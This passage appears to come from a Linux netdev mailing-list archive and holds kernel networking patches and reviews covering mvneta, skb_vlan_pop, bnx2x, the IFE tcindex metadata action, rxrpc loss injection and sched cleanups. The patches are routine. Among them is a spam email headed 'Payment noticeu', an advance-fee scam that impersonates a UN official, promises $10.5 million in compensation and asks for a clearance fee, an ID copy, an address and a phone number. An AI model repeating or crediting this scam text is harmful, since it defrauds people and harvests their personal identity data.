 drivers/net/ethernet/marvell/mvneta.c | 10 ++
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/marvell/mvneta.c 
b/drivers/net/ethernet/marvell/mvneta.c
index 32f0cc4..03be592 100644
--- a/drivers/net/ethernet/marvell/mvneta.c
+++ b/drivers/net/ethernet/marvell/mvneta.c
@@ -636,8 +636,9 @@ static void mvneta_mib_counters_clear(struct mvneta_port 
*pp)
 }
 
 /* Get System Network Statistics */
-struct rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,
-struct rtnl_link_stats64 *stats)
+static struct
+rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,
+ struct rtnl_link_stats64 *stats)
 {
struct mvneta_port *pp = netdev_priv(dev);
unsigned int start;
@@ -3526,8 +3527,9 @@ static int mvneta_ioctl(struct net_device *dev, struct 
ifreq *ifr, int cmd)
 /* Ethtool methods */
 
 /* Set link ksettings (phy address, speed) for ethtools */
-int mvneta_ethtool_set_link_ksettings(struct net_device *ndev,
- const struct ethtool_link_ksettings *cmd)
+static int
+mvneta_ethtool_set_link_ksettings(struct net_device *ndev,
+ const struct ethtool_link_ksettings *cmd)
 {
struct mvneta_port *pp = netdev_priv(ndev);
struct phy_device *phydev = ndev->phydev;
-- 
2.7.4

[PATCH] net: skbuff: Fix length validation in skb_vlan_pop()

2016-09-18 Thread Shmulik Ladkani

In 93515d53b1
  "net: move vlan pop/push functions into common code"
skb_vlan_pop was moved from its private location in openvswitch to
skbuff common code.

In case !vlan_tx_tag_present, the original 'pop_vlan()' assured
that skb->len is sufficient for the existence of a vlan_ethhdr
(if skb->len < VLAN_ETH_HLEN then pop was a no-op).

This validation was moved as is into the new common 'skb_vlan_pop'.

Alas, in its original location (openvswitch), there's a guarantee that
'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
condition made sense.
However there's no such guarantee in the generic 'skb_vlan_pop'.

For short packets received in rx path going through 'skb_vlan_pop',
this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in case tag
is in payload), or to fail moving next tag into hw-accel tag.

Instead, verify that 'skb->mac_len' is sufficient.

Signed-off-by: Shmulik Ladkani 
---
 Spotted by code review while doing work augmenting tc act vlan.

 net/core/skbuff.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 1e329d4112..cc2c004838 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -4537,7 +4537,7 @@ int skb_vlan_pop(struct sk_buff *skb)
} else {
if (unlikely((skb->protocol != htons(ETH_P_8021Q) &&
  skb->protocol != htons(ETH_P_8021AD)) ||
-skb->len < VLAN_ETH_HLEN))
+skb->mac_len < VLAN_ETH_HLEN))
return 0;
 
err = __skb_vlan_pop(skb, &vlan_tci);
@@ -4547,7 +4547,7 @@ int skb_vlan_pop(struct sk_buff *skb)
/* move next vlan tag to hw accel tag */
if (likely((skb->protocol != htons(ETH_P_8021Q) &&
skb->protocol != htons(ETH_P_8021AD)) ||
-  skb->len < VLAN_ETH_HLEN))
+  skb->mac_len < VLAN_ETH_HLEN))
return 0;
 
vlan_proto = skb->protocol;
-- 
2.7.4

RE: [PATCH net-next 2/2] bnx2x: allocate mac filtering pending list in PAGE_SIZE increments

2016-09-18 Thread Mintz, Yuval

> Currently, we can have high order page allocations that specify
> GFP_ATOMIC when configuring multicast MAC address filters.
> 
> For example, we have seen order 2 page allocation failures with
> ~500 multicast addresses configured.
> 
> Convert the allocation for the pending list to be done in PAGE_SIZE
> increments.
> 
> Signed-off-by: Jason Baron 

While I appreciate the effort, I wonder whether it's worth it:

- The hardware [even in its newer generation] provides an approximate
based classification [I.e., hashed] with 256 bins.
When configuring 500 multicast addresses, one can argue the
difference between multicast-promisc mode and actual configuration
is insignificant.
Perhaps the easier-to-maintain alternative would simply be to
determine the maximal number of multicast addresses that can be
configured using a single PAGE, and if in need of more than that
simply move into multicast-promisc.

 - While GFP_ATOMIC is required in this flow due to the fact it's being
called from sleepless context, I do believe this is mostly a remnant -
it's possible that by slightly changing the locking scheme we can have
the configuration done from sleepless context and simply switch to
GFP_KERNEL instead.

Regarding the patch itself, only comment I have:
> + elem_group = (struct bnx2x_mcast_elem_group *)
> +  elem_group->mcast_group_link.next;
Let's use list_next_entry() instead.

Re: [PATCH] net/mlx5: clean function declarations in eswitch.c up

2016-09-18 Thread Leon Romanovsky

On Sun, Sep 18, 2016 at 04:44:22PM +0800, Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:463:5: warning: no 
> previous prototype for 'esw_offloads_init' [-Wmissing-prototypes]
> drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:521:6: warning: no 
> previous prototype for 'esw_offloads_cleanup' [-Wmissing-prototypes]
>
> In fact, both functions are declared in
> drivers/net/ethernet/mellanox/mlx5/core/eswitch.c,but should be
> declared in a header file, thus can be recognized in other file.
>
> So this patch moves the declarations into
> drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
>
> Signed-off-by: Baoyou Xie 

Thanks,
Acked-by: Leon Romanovsky 


signature.asc
Description: PGP signature

[PATCH v2 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

Sample use case of how this is encoded:
user space via tuntap (or a connected VM/Machine/container)
encodes the tcindex TLV.

Sample use case of decoding:
IFE action decodes it and the skb->tc_index is then used to classify.
So something like this for encoded ICMP packets:

.. first decode then reclassify... skb->tcindex will be set
sudo $TC filter add dev $ETH parent : prio 2 protocol 0xbeef \
u32 match u32 0 0 flowid 1:1 \
action ife decode reclassify

...next match the decode icmp packet...
sudo $TC filter add dev $ETH parent : prio 4 protocol ip \
u32 match ip protocol 1 0xff flowid 1:1 \
action continue

... last classify it using the tcindex classifier and do someaction..
sudo $TC filter add dev $ETH parent : prio 5 protocol ip \
handle 0x11 tcindex classid 1:1 \
action blah..

Signed-off-by: Jamal Hadi Salim 
---
 include/uapi/linux/tc_act/tc_ife.h | 3 ++-
 net/sched/Kconfig  | 5 +
 net/sched/Makefile | 1 +
 3 files changed, 8 insertions(+), 1 deletion(-)

diff --git a/include/uapi/linux/tc_act/tc_ife.h 
b/include/uapi/linux/tc_act/tc_ife.h
index 4ece02a..cd18360 100644
--- a/include/uapi/linux/tc_act/tc_ife.h
+++ b/include/uapi/linux/tc_act/tc_ife.h
@@ -32,8 +32,9 @@ enum {
 #define IFE_META_HASHID 2
 #defineIFE_META_PRIO 3
 #defineIFE_META_QMAP 4
+#defineIFE_META_TCINDEX 5
 /*Can be overridden at runtime by module option*/
-#define__IFE_META_MAX 5
+#define__IFE_META_MAX 6
 #define IFE_META_MAX (__IFE_META_MAX - 1)
 
 #endif
diff --git a/net/sched/Kconfig b/net/sched/Kconfig
index 7795d5a..87956a7 100644
--- a/net/sched/Kconfig
+++ b/net/sched/Kconfig
@@ -793,6 +793,11 @@ config NET_IFE_SKBPRIO
 depends on NET_ACT_IFE
 ---help---
 
+config NET_IFE_SKBTCINDEX
+tristate "Support to encoding decoding skb tcindex on IFE action"
+depends on NET_ACT_IFE
+---help---
+
 config NET_CLS_IND
bool "Incoming device classification"
depends on NET_CLS_U32 || NET_CLS_FW
diff --git a/net/sched/Makefile b/net/sched/Makefile
index 148ae0d..4bdda36 100644
--- a/net/sched/Makefile
+++ b/net/sched/Makefile
@@ -23,6 +23,7 @@ obj-$(CONFIG_NET_ACT_SKBMOD)  += act_skbmod.o
 obj-$(CONFIG_NET_ACT_IFE)  += act_ife.o
 obj-$(CONFIG_NET_IFE_SKBMARK)  += act_meta_mark.o
 obj-$(CONFIG_NET_IFE_SKBPRIO)  += act_meta_skbprio.o
+obj-$(CONFIG_NET_IFE_SKBTCINDEX)   += act_meta_skbtcindex.o
 obj-$(CONFIG_NET_ACT_TUNNEL_KEY)+= act_tunnel_key.o
 obj-$(CONFIG_NET_SCH_FIFO) += sch_fifo.o
 obj-$(CONFIG_NET_SCH_CBQ)  += sch_cbq.o
-- 
1.9.1

[PATCH v2 net-next 1/2] net sched ife action: add 16 bit helpers

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

encoder and checker for 16 bits metadata

Signed-off-by: Jamal Hadi Salim 
---
 include/net/tc_act/tc_ife.h |  2 ++
 net/sched/act_ife.c | 26 ++
 2 files changed, 28 insertions(+)

diff --git a/include/net/tc_act/tc_ife.h b/include/net/tc_act/tc_ife.h
index 5164bd7..9fd2bea0 100644
--- a/include/net/tc_act/tc_ife.h
+++ b/include/net/tc_act/tc_ife.h
@@ -50,9 +50,11 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen,
 int ife_alloc_meta_u32(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_alloc_meta_u16(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi);
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi);
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi);
 int ife_validate_meta_u32(void *val, int len);
 int ife_validate_meta_u16(void *val, int len);
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi);
 void ife_release_meta_gen(struct tcf_meta_info *mi);
 int register_ife_op(struct tcf_meta_ops *mops);
 int unregister_ife_op(struct tcf_meta_ops *mops);
diff --git a/net/sched/act_ife.c b/net/sched/act_ife.c
index e87cd81..ccf7b4b 100644
--- a/net/sched/act_ife.c
+++ b/net/sched/act_ife.c
@@ -63,6 +63,23 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen, const void *dval)
 }
 EXPORT_SYMBOL_GPL(ife_tlv_meta_encode);
 
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi)
+{
+   u16 edata = 0;
+
+   if (mi->metaval)
+   edata = *(u16 *)mi->metaval;
+   else if (metaval)
+   edata = metaval;
+
+   if (!edata) /* will not encode */
+   return 0;
+
+   edata = htons(edata);
+   return ife_tlv_meta_encode(skbdata, mi->metaid, 2, &edata);
+}
+EXPORT_SYMBOL_GPL(ife_encode_meta_u16);
+
 int ife_get_meta_u32(struct sk_buff *skb, struct tcf_meta_info *mi)
 {
if (mi->metaval)
@@ -81,6 +98,15 @@ int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi)
 }
 EXPORT_SYMBOL_GPL(ife_check_meta_u32);
 
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi)
+{
+   if (metaval || mi->metaval)
+   return 8; /* T+L+(V) == 2+2+(2+2bytepad) */
+
+   return 0;
+}
+EXPORT_SYMBOL_GPL(ife_check_meta_u16);
+
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi)
 {
u32 edata = metaval;
-- 
1.9.1

Re: [PATCH net-next 00/14] rxrpc: Fixes & miscellany

2016-09-18 Thread David Miller


David, could you please stop submitting two sets of series at
the same time?

I want people to have a single, reasonably sized, patch series
in flight at one time for a given subsystem/driver/whatever.

But if you send both an 14 and an 11 patch series at the same
time, that defeats this entirely.

Thank you.

Re: [PATCH v2 net-next 1/2] net sched ife action: add 16 bit helpers

2016-09-18 Thread Jamal Hadi Salim


Sorry something missing - will send v3.

cheers,
jamal

On 16-09-18 07:21 AM, Jamal Hadi Salim wrote:

From: Jamal Hadi Salim 

encoder and checker for 16 bits metadata

[PATCH v3 net-next 1/2] net sched ife action: add 16 bit helpers

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

encoder and checker for 16 bits metadata

Signed-off-by: Jamal Hadi Salim 
---
 include/net/tc_act/tc_ife.h |  2 ++
 net/sched/act_ife.c | 26 ++
 2 files changed, 28 insertions(+)

diff --git a/include/net/tc_act/tc_ife.h b/include/net/tc_act/tc_ife.h
index 5164bd7..9fd2bea0 100644
--- a/include/net/tc_act/tc_ife.h
+++ b/include/net/tc_act/tc_ife.h
@@ -50,9 +50,11 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen,
 int ife_alloc_meta_u32(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_alloc_meta_u16(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi);
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi);
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi);
 int ife_validate_meta_u32(void *val, int len);
 int ife_validate_meta_u16(void *val, int len);
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi);
 void ife_release_meta_gen(struct tcf_meta_info *mi);
 int register_ife_op(struct tcf_meta_ops *mops);
 int unregister_ife_op(struct tcf_meta_ops *mops);
diff --git a/net/sched/act_ife.c b/net/sched/act_ife.c
index e87cd81..ccf7b4b 100644
--- a/net/sched/act_ife.c
+++ b/net/sched/act_ife.c
@@ -63,6 +63,23 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen, const void *dval)
 }
 EXPORT_SYMBOL_GPL(ife_tlv_meta_encode);
 
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi)
+{
+   u16 edata = 0;
+
+   if (mi->metaval)
+   edata = *(u16 *)mi->metaval;
+   else if (metaval)
+   edata = metaval;
+
+   if (!edata) /* will not encode */
+   return 0;
+
+   edata = htons(edata);
+   return ife_tlv_meta_encode(skbdata, mi->metaid, 2, &edata);
+}
+EXPORT_SYMBOL_GPL(ife_encode_meta_u16);
+
 int ife_get_meta_u32(struct sk_buff *skb, struct tcf_meta_info *mi)
 {
if (mi->metaval)
@@ -81,6 +98,15 @@ int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi)
 }
 EXPORT_SYMBOL_GPL(ife_check_meta_u32);
 
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi)
+{
+   if (metaval || mi->metaval)
+   return 8; /* T+L+(V) == 2+2+(2+2bytepad) */
+
+   return 0;
+}
+EXPORT_SYMBOL_GPL(ife_check_meta_u16);
+
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi)
 {
u32 edata = metaval;
-- 
1.9.1

[PATCH v3 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

Sample use case of how this is encoded:
user space via tuntap (or a connected VM/Machine/container)
encodes the tcindex TLV.

Sample use case of decoding:
IFE action decodes it and the skb->tc_index is then used to classify.
So something like this for encoded ICMP packets:

.. first decode then reclassify... skb->tcindex will be set
sudo $TC filter add dev $ETH parent : prio 2 protocol 0xbeef \
u32 match u32 0 0 flowid 1:1 \
action ife decode reclassify

...next match the decode icmp packet...
sudo $TC filter add dev $ETH parent : prio 4 protocol ip \
u32 match ip protocol 1 0xff flowid 1:1 \
action continue

... last classify it using the tcindex classifier and do someaction..
sudo $TC filter add dev $ETH parent : prio 5 protocol ip \
handle 0x11 tcindex classid 1:1 \
action blah..

Signed-off-by: Jamal Hadi Salim 
---
 include/uapi/linux/tc_act/tc_ife.h |  3 +-
 net/sched/Kconfig  |  5 +++
 net/sched/Makefile |  1 +
 net/sched/act_meta_skbtcindex.c| 79 ++
 4 files changed, 87 insertions(+), 1 deletion(-)
 create mode 100644 net/sched/act_meta_skbtcindex.c

diff --git a/include/uapi/linux/tc_act/tc_ife.h 
b/include/uapi/linux/tc_act/tc_ife.h
index 4ece02a..cd18360 100644
--- a/include/uapi/linux/tc_act/tc_ife.h
+++ b/include/uapi/linux/tc_act/tc_ife.h
@@ -32,8 +32,9 @@ enum {
 #define IFE_META_HASHID 2
 #defineIFE_META_PRIO 3
 #defineIFE_META_QMAP 4
+#defineIFE_META_TCINDEX 5
 /*Can be overridden at runtime by module option*/
-#define__IFE_META_MAX 5
+#define__IFE_META_MAX 6
 #define IFE_META_MAX (__IFE_META_MAX - 1)
 
 #endif
diff --git a/net/sched/Kconfig b/net/sched/Kconfig
index 7795d5a..87956a7 100644
--- a/net/sched/Kconfig
+++ b/net/sched/Kconfig
@@ -793,6 +793,11 @@ config NET_IFE_SKBPRIO
 depends on NET_ACT_IFE
 ---help---
 
+config NET_IFE_SKBTCINDEX
+tristate "Support to encoding decoding skb tcindex on IFE action"
+depends on NET_ACT_IFE
+---help---
+
 config NET_CLS_IND
bool "Incoming device classification"
depends on NET_CLS_U32 || NET_CLS_FW
diff --git a/net/sched/Makefile b/net/sched/Makefile
index 148ae0d..4bdda36 100644
--- a/net/sched/Makefile
+++ b/net/sched/Makefile
@@ -23,6 +23,7 @@ obj-$(CONFIG_NET_ACT_SKBMOD)  += act_skbmod.o
 obj-$(CONFIG_NET_ACT_IFE)  += act_ife.o
 obj-$(CONFIG_NET_IFE_SKBMARK)  += act_meta_mark.o
 obj-$(CONFIG_NET_IFE_SKBPRIO)  += act_meta_skbprio.o
+obj-$(CONFIG_NET_IFE_SKBTCINDEX)   += act_meta_skbtcindex.o
 obj-$(CONFIG_NET_ACT_TUNNEL_KEY)+= act_tunnel_key.o
 obj-$(CONFIG_NET_SCH_FIFO) += sch_fifo.o
 obj-$(CONFIG_NET_SCH_CBQ)  += sch_cbq.o
diff --git a/net/sched/act_meta_skbtcindex.c b/net/sched/act_meta_skbtcindex.c
new file mode 100644
index 000..3b35774
--- /dev/null
+++ b/net/sched/act_meta_skbtcindex.c
@@ -0,0 +1,79 @@
+/*
+ * net/sched/act_meta_tc_index.c IFE skb->tc_index metadata module
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License
+ * as published by the Free Software Foundation; either version
+ * 2 of the License, or (at your option) any later version.
+ *
+ * copyright Jamal Hadi Salim (2016)
+ *
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+static int skbtcindex_encode(struct sk_buff *skb, void *skbdata,
+struct tcf_meta_info *e)
+{
+   u32 ifetc_index = skb->tc_index;
+
+   return ife_encode_meta_u16(ifetc_index, skbdata, e);
+}
+
+static int skbtcindex_decode(struct sk_buff *skb, void *data, u16 len)
+{
+   u16 ifetc_index = *(u16 *)data;
+
+   skb->tc_index = ntohs(ifetc_index);
+   return 0;
+}
+
+static int skbtcindex_check(struct sk_buff *skb, struct tcf_meta_info *e)
+{
+   return ife_check_meta_u16(skb->tc_index, e);
+}
+
+static struct tcf_meta_ops ife_skbtcindex_ops = {
+   .metaid = IFE_META_TCINDEX,
+   .metatype = NLA_U16,
+   .name = "tc_index",
+   .synopsis = "skb tc_index 16 bit metadata",
+   .check_presence = skbtcindex_check,
+   .encode = skbtcindex_encode,
+   .decode = skbtcindex_decode,
+   .get = ife_get_meta_u16,
+   .alloc = ife_alloc_meta_u16,
+   .release = ife_release_meta_gen,
+   .validate = ife_validate_meta_u16,
+   .owner = THIS_MODULE,
+};
+
+static int __init ifetc_index_init_module(void)
+{
+   return register_ife_op(&ife_skbtcindex_ops);
+}
+
+static void __exit ifetc_index_cleanup_module(void)
+{
+   unregister_ife_op(&ife_skbtcindex_ops);
+}
+
+module_init(ifetc_index_init_module);
+module_exit(ifetc_index_cleanup_module);
+
+MODULE_AUTHOR("Jamal Hadi Salim(2016)");
+MODULE_DESCRIPTION("Inter-FE skb tc_index metadata module");
+MODULE_LICENSE

Re: [PATCH] net: mvneta: mark symbols static where possible

2016-09-18 Thread Thomas Petazzoni

Hello,

On Sun, 18 Sep 2016 17:20:45 +0800, Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/marvell/mvneta.c:639:27: warning: no previous prototype 
> for 'mvneta_get_stats64' [-Wmissing-prototypes]
> drivers/net/ethernet/marvell/mvneta.c:3529:5: warning: no previous prototype 
> for 'mvneta_ethtool_set_link_ksettings' [-Wmissing-prototypes]
> 
> In fact, these functions are only used in the file in which they are
> declared and don't need a declaration, but can be made static.
> so this patch marks these functions with 'static'.
> 
> Signed-off-by: Baoyou Xie 

Acked-by: Thomas Petazzoni 

-- 
Thomas Petazzoni, CTO, Free Electrons
Embedded Linux and Kernel engineering
http://free-electrons.com

Re: [PATCH net-next 11/11] rxrpc: Add config to inject packet loss

2016-09-18 Thread Sergei Shtylyov


Hello.

On 9/18/2016 2:22 AM, David Howells wrote:


Add a configuration option to inject packet loss by discarding
approximately every 8th packet received and approximately every 8th DATA
packet transmitted.

Note that no locking is used, but it shouldn't really matter.

Signed-off-by: David Howells 


[...]


diff --git a/net/rxrpc/input.c b/net/rxrpc/input.c
index 84bb16d47b85..7ac1edf3aac7 100644
--- a/net/rxrpc/input.c
+++ b/net/rxrpc/input.c
@@ -712,6 +712,14 @@ void rxrpc_data_ready(struct sock *udp_sk)
skb_orphan(skb);
sp = rxrpc_skb(skb);

+   if (IS_ENABLED(CONFIG_AF_RXRPC_INJECT_LOSS)) {
+   static int lose;


   IIRC, scripts/checkpatch.pl complains now if there's no empty line after 
declaration...



+   if ((lose++ & 7) == 7) {
+   rxrpc_lose_skb(skb, rxrpc_skb_rx_lost);
+   return;
+   }
+   }
+
_net("Rx UDP packet from %08x:%04hu",
 ntohl(ip_hdr(skb)->saddr), ntohs(udp_hdr(skb)->source));

diff --git a/net/rxrpc/output.c b/net/rxrpc/output.c
index a2cad5ce7416..16e18a94ffa6 100644
--- a/net/rxrpc/output.c
+++ b/net/rxrpc/output.c
@@ -225,6 +225,15 @@ int rxrpc_send_data_packet(struct rxrpc_connection *conn, 
struct sk_buff *skb)
msg.msg_controllen = 0;
msg.msg_flags = 0;

+   if (IS_ENABLED(CONFIG_AF_RXRPC_INJECT_LOSS)) {
+   static int lose;


   Same here.


+   if ((lose++ & 7) == 7) {
+   rxrpc_lose_skb(skb, rxrpc_skb_tx_lost);
+   _leave(" = 0 [lose]");
+   return 0;
+   }
+   }
+
/* send the packet with the don't fragment bit set if we currently
 * think it's small enough */
if (skb->len - sizeof(struct rxrpc_wire_header) < 
conn->params.peer->maxdata) {


MBR, Sergei

[PATCH net-next 1/1] net sched actions police: peg drop stats for conforming traffic

2016-09-18 Thread Jamal Hadi Salim

From: Roman Mashak 

setting conforming action to drop is a valid policy.
When it is set we need to at least see the stats indicating it
for debugging.

Signed-off-by: Roman Mashak 
Signed-off-by: Jamal Hadi Salim 
---
 net/sched/act_police.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/net/sched/act_police.c b/net/sched/act_police.c
index 8a3be1d..ba7074b 100644
--- a/net/sched/act_police.c
+++ b/net/sched/act_police.c
@@ -249,6 +249,8 @@ static int tcf_act_police(struct sk_buff *skb, const struct 
tc_action *a,
police->tcfp_t_c = now;
police->tcfp_toks = toks;
police->tcfp_ptoks = ptoks;
+   if (police->tcfp_result == TC_ACT_SHOT)
+   police->tcf_qstats.drops++;
spin_unlock(&police->tcf_lock);
return police->tcfp_result;
}
-- 
1.9.1

Re: [PATCH] net: mvneta: mark symbols static where possible

2016-09-18 Thread Sergei Shtylyov


Hello.

On 9/18/2016 12:20 PM, Baoyou Xie wrote:


We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/marvell/mvneta.c:639:27: warning: no previous prototype 
for 'mvneta_get_stats64' [-Wmissing-prototypes]
drivers/net/ethernet/marvell/mvneta.c:3529:5: warning: no previous prototype 
for 'mvneta_ethtool_set_link_ksettings' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/marvell/mvneta.c | 10 ++
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/marvell/mvneta.c 
b/drivers/net/ethernet/marvell/mvneta.c
index 32f0cc4..03be592 100644
--- a/drivers/net/ethernet/marvell/mvneta.c
+++ b/drivers/net/ethernet/marvell/mvneta.c
@@ -636,8 +636,9 @@ static void mvneta_mib_counters_clear(struct mvneta_port 
*pp)
 }

 /* Get System Network Statistics */
-struct rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,
-struct rtnl_link_stats64 *stats)
+static struct
+rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,


   I'd break the line after * heren not where you did it. This way the 
function type would remain all in one line.



+ struct rtnl_link_stats64 *stats)
 {
struct mvneta_port *pp = netdev_priv(dev);
unsigned int start;

[...]

MBR, Sergei

eBPF: how to check the flow table

2016-09-18 Thread Eric Leblond

Hello,

I'm currently testing a code implementing AF_PACKET bypass for
Suricata. The idea is that Suricata is updating a hash table containing
a list of flows it does not want to see anymore.

I want to check flow timeout from the userspace, so my current
algorithm is doing:

    while (bpf_get_next_key(mapfd, &key, &next_key) == 0) {
bpf_lookup_elem(mapfd, &next_key, &value);
        FlowCallback(mapfd, &next_key, &value, data);
        key = next_key;
    }

In the FlowCallback, I check the timing in the flow entry and I remove
the key if the flow is timeout.

This is currently working well when there is only a few flows but on a
real system with log of insertion in the table, the loop is never
returning because we dequeue slower than we enqueue.

Is there a better algorithm or an other way to do it ? 

BR,
-- 
Eric Leblond 
Blog: https://home.regit.org/

Payment noticeu

2016-09-18 Thread Heidi Mendoza

Attn: Beneficiary

My name is Ms. Heidi Mendoza, Head Of United Nations Under-Secretary- General 
For Internal Oversight Services.

Meanwhile, I wish to inform you were among the scam victims listed to be 
released their overdue funds by the UNITED NATIONS in conjunction with the 
International Monetary Fund (IMF) after the last encounter we held concerning 
your funds. As directed by UN secretary General Ban Ki-Moon in collaborations 
with the IRS, I wish to state categorically that a transfer of $10,500,000.00 
will be made to your bank account as almost 99% cost associated with the 
transfer of your funds has been prepaid by the U.S. Government. The only fee 
you will pay is the cost of processing a "Fund Clearance Certificate" by the 
paying bank. The "Fund Clearance Certificate" is required in accordance with 
the U.S. Monetary Transfer or deposit Policy and it is the only fee you will 
have to pay before your funds can be transferred to your account. After you 
have paid for the above mentioned certificate, the paying bank will process it 
and send a copy of it to you for your perusal.

Note once again that your overdue payment will be credited into your account 
you will furnish with the Bank without any delay as approved by United Nations, 
International Monetary Fund, World Bank, and United States Government.

However, this is to inform you that we have been mandated by the United Nations 
Compensation Commission (UNCC) department through the Financial Crimes 
Enforcement Network (FinCEN) of the United States Department of the Treasury to 
release your overdue funds directly from the United Nations Compensation Fund 
Account via Telegraphic Transfer into your designated bank account. Note that 
the above sum is the payment of compensation awarded to you for losses and 
trauma resulting directly from scam committed against you in line with the 
Resolution 1483 (2012) adopted by the United Nations Security Council 
Headquarters in New York following series of complaints by the victims of scam.

Right from this moment, I will advise you to stop all further conversation with 
whomever you might be in contact with, promising to transfer your money to you, 
either through Lottery Winnings, Act as a Next of Kin, investment plan, dating 
from any social websites or any other related issue that involves transferring 
money as they are all nothing but fake.

Urgently respond with your full name, full address, copy of identification and 
direct phone number so that I will furnish you with the contact information of 
the paying bank. Remember, they will instruct you on how to send the money to 
them as soon as you contact them.

Yours Sincerely,

Ms. Heidi Mendoza

[PATCH net-next 1/1] net sched: stylistic cleanups

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

Signed-off-by: Jamal Hadi Salim 
---
 net/sched/act_api.c | 16 ++--
 net/sched/act_csum.c| 36 ++--
 net/sched/act_gact.c|  3 ++-
 net/sched/act_mirred.c  |  3 ++-
 net/sched/act_police.c  | 10 --
 net/sched/cls_api.c | 18 ++
 net/sched/cls_bpf.c |  6 --
 net/sched/cls_flow.c| 21 ++---
 net/sched/cls_flower.c  |  3 ++-
 net/sched/cls_fw.c  | 10 +-
 net/sched/cls_route.c   |  9 +++--
 net/sched/cls_tcindex.c | 12 ++--
 net/sched/cls_u32.c | 30 --
 net/sched/sch_api.c | 41 ++---
 14 files changed, 114 insertions(+), 104 deletions(-)

diff --git a/net/sched/act_api.c b/net/sched/act_api.c
index d09d068..d0aceb1 100644
--- a/net/sched/act_api.c
+++ b/net/sched/act_api.c
@@ -592,9 +592,8 @@ err_out:
return ERR_PTR(err);
 }
 
-int tcf_action_init(struct net *net, struct nlattr *nla,
- struct nlattr *est, char *name, int ovr,
- int bind, struct list_head *actions)
+int tcf_action_init(struct net *net, struct nlattr *nla, struct nlattr *est,
+   char *name, int ovr, int bind, struct list_head *actions)
 {
struct nlattr *tb[TCA_ACT_MAX_PRIO + 1];
struct tc_action *act;
@@ -923,9 +922,8 @@ tcf_add_notify(struct net *net, struct nlmsghdr *n, struct 
list_head *actions,
return err;
 }
 
-static int
-tcf_action_add(struct net *net, struct nlattr *nla, struct nlmsghdr *n,
-  u32 portid, int ovr)
+static int tcf_action_add(struct net *net, struct nlattr *nla,
+ struct nlmsghdr *n, u32 portid, int ovr)
 {
int ret = 0;
LIST_HEAD(actions);
@@ -988,8 +986,7 @@ replay:
return ret;
 }
 
-static struct nlattr *
-find_dump_kind(const struct nlmsghdr *n)
+static struct nlattr *find_dump_kind(const struct nlmsghdr *n)
 {
struct nlattr *tb1, *tb2[TCA_ACT_MAX + 1];
struct nlattr *tb[TCA_ACT_MAX_PRIO + 1];
@@ -1016,8 +1013,7 @@ find_dump_kind(const struct nlmsghdr *n)
return kind;
 }
 
-static int
-tc_dump_action(struct sk_buff *skb, struct netlink_callback *cb)
+static int tc_dump_action(struct sk_buff *skb, struct netlink_callback *cb)
 {
struct net *net = sock_net(skb->sk);
struct nlmsghdr *nlh;
diff --git a/net/sched/act_csum.c b/net/sched/act_csum.c
index b5dbf63..e0defce 100644
--- a/net/sched/act_csum.c
+++ b/net/sched/act_csum.c
